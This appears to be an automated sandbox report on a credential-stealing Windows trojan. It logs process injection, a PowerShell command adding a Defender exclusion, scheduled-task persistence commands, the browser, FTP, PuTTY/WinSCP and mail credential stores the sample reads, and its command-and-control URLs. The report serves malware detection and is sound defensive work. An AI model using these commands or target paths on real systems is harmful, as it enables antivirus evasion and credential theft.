              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C79008Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aWBoUwiux.exe"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmpE3D.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aWBoUwiux" /XML "C:\Users\user\AppData\Local\Temp\tmp33C7.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeQueries volume information: C:\Users\user\Desktop\LEmJJ87mUQ.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeQueries volume information: C:\Users\user\AppData\Roaming\aWBoUwiux.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000008.00000002.2395876159.00000000030A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: PopPassword8_2_0040D069
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: SmtpPassword8_2_0040D069
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              2
              OS Credential Dumping
              2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job
              1
              Access Token Manipulation
              1
              Deobfuscate/Decode Files or Information
              2
              Credentials in Registry
              13
              System Information Discovery
              Remote Desktop Protocol2
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
              Process Injection
              4
              Obfuscated Files or Information
              Security Account Manager121
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Scheduled Task/Job
              12
              Software Packing
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture112
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets41
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Virtualization/Sandbox Evasion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
              Process Injection
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567584 Sample: LEmJJ87mUQ.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 44 touxzw.ir 2->44 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 11 other signatures 2->54 8 LEmJJ87mUQ.exe 7 2->8         started        12 aWBoUwiux.exe 4 2->12         started        signatures3 process4 file5 36 C:\Users\user\AppData\Roaming\aWBoUwiux.exe, PE32 8->36 dropped 38 C:\Users\...\aWBoUwiux.exe:Zone.Identifier, ASCII 8->38 dropped 40 C:\Users\user\AppData\Local\Temp\tmpE3D.tmp, XML 8->40 dropped 42 C:\Users\user\AppData\...\LEmJJ87mUQ.exe.log, ASCII 8->42 dropped 56 Uses schtasks.exe or at.exe to add and modify task schedules 8->56 58 Writes to foreign memory regions 8->58 60 Allocates memory in foreign processes 8->60 66 2 other signatures 8->66 14 RegSvcs.exe 57 8->14         started        18 powershell.exe 23 8->18         started        20 RegSvcs.exe 8->20         started        22 schtasks.exe 1 8->22         started        62 Multi AV Scanner detection for dropped file 12->62 64 Machine Learning detection for dropped file 12->64 24 schtasks.exe 1 12->24         started        26 WerFault.exe 21 12->26         started        signatures6 process7 dnsIp8 46 touxzw.ir 172.67.134.88, 49749, 49751, 49757 CLOUDFLARENETUS United States 14->46 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->68 70 Tries to steal Mail credentials (via file / registry access) 14->70 72 Tries to harvest and steal ftp login credentials 14->72 74 Tries to harvest and steal browser information (history, passwords, etc) 14->74 76 Loading BitLocker PowerShell Module 18->76 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        78 Tries to steal Mail credentials (via file registry) 20->78 32 conhost.exe 22->32         started        34 conhost.exe 24->34         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              LEmJJ87mUQ.exe55%ReversingLabsByteCode-MSIL.Backdoor.FormBook
              LEmJJ87mUQ.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\aWBoUwiux.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\aWBoUwiux.exe55%ReversingLabsByteCode-MSIL.Backdoor.FormBook
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://touxzw.ir/sirr/five/fre.php100%Avira URL Cloudmalware
              touxzw.ir/sirr/five/fre.php100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0033.t-0009.t-msedge.net
              13.107.246.61
              truefalse
                unknown
                touxzw.ir
                172.67.134.88
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  http://touxzw.ir/sirr/five/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://kbfvzoboss.bid/alien/fre.phpfalse
                    high
                    http://alphastand.win/alien/fre.phpfalse
                      high
                      http://alphastand.trade/alien/fre.phpfalse
                        high
                        http://alphastand.top/alien/fre.phpfalse
                          high
                          touxzw.ir/sirr/five/fre.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLEmJJ87mUQ.exe, 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2502975409.0000000002954000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0LEmJJ87mUQ.exe, aWBoUwiux.exe.0.drfalse
                              high
                              http://www.ibsensoftware.com/RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, aWBoUwiux.exe, 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/DataSet1.xsdLEmJJ87mUQ.exe, aWBoUwiux.exe.0.drfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  172.67.134.88
                                  touxzw.irUnited States
                                  13335CLOUDFLARENETUStrue
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1567584
                                  Start date and time:2024-12-03 17:12:52 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 21s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:18
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:LEmJJ87mUQ.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:868444860f70d7825d5801e3ebdc8e9f0c5ffe72c3f42a938b7df98d50e10758.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@18/16@1/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 198
                                  • Number of non-executed functions: 13
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  • VT rate limit hit for: LEmJJ87mUQ.exe
                                  TimeTypeDescription
                                  11:14:04API Interceptor2x Sleep call for process: LEmJJ87mUQ.exe modified
                                  11:14:11API Interceptor16x Sleep call for process: powershell.exe modified
                                  11:14:13API Interceptor2x Sleep call for process: aWBoUwiux.exe modified
                                  11:14:17API Interceptor1x Sleep call for process: RegSvcs.exe modified
                                  11:14:26API Interceptor1x Sleep call for process: WerFault.exe modified
                                  17:14:12Task SchedulerRun new task: aWBoUwiux path: C:\Users\user\AppData\Roaming\aWBoUwiux.exe
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  172.67.134.88http://www.bk8vn.vip/register?affid=17329Get hashmaliciousUnknownBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    s-part-0033.t-0009.t-msedge.nethttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.61
                                    http://nxejt.polluxcastor.topGet hashmaliciousUnknownBrowse
                                    • 13.107.246.61
                                    https://mzvdazkxhcgohr.azureedge.net/7766j/?fbclid=IwY2xjawEYc-5leHRuA2FlbQEwAAEdG07X18DGPEURgpfyaSZY6plE3zyyIkcG5kokds9mnvD6i-BtmiU_lzIp_aem_ff88HnOUTFQFLZ993tisVw#Get hashmaliciousUnknownBrowse
                                    • 13.107.246.61
                                    https://www.imca-int.com/safety-events/loss-of-pressure-to-divers-primary-air-supply/#msdynttrid=gm4lm4Er39QjZQgkKZVlOHSa50W_Z4pWVjSg4GGAJjQGet hashmaliciousUnknownBrowse
                                    • 13.107.246.61
                                    https://4smgswwi.r.us-west-2.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9917688bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541primmacy.com%252Fwinner%252F77663%252F%252FYmVja3kuYmFyY2tsZXlAY2xlYXJ3YXRlcnBhcGVyLmNvbQ==/1/0101019079f53360-ad062f3a-6c08-4c14-8569-269fb9f20297-000000/mkI5299-kBX9yyfDwVrQlybi5Wk=382Get hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.61
                                    umcu.org.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.61
                                    touxzw.irlf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                    • 188.114.97.3
                                    zxalphamn.docGet hashmaliciousLokibotBrowse
                                    • 188.114.96.9
                                    DRAFT DOC2406656.bat.exeGet hashmaliciousLokibotBrowse
                                    • 188.114.96.3
                                    Comprobante.PDF867564575869708776565434576897.exeGet hashmaliciousLokibotBrowse
                                    • 188.114.96.3
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUShttps://odinling.es/sharep/sharepp/index1.html#info@securusmonitoring.comGet hashmaliciousUnknownBrowse
                                    • 172.67.131.129
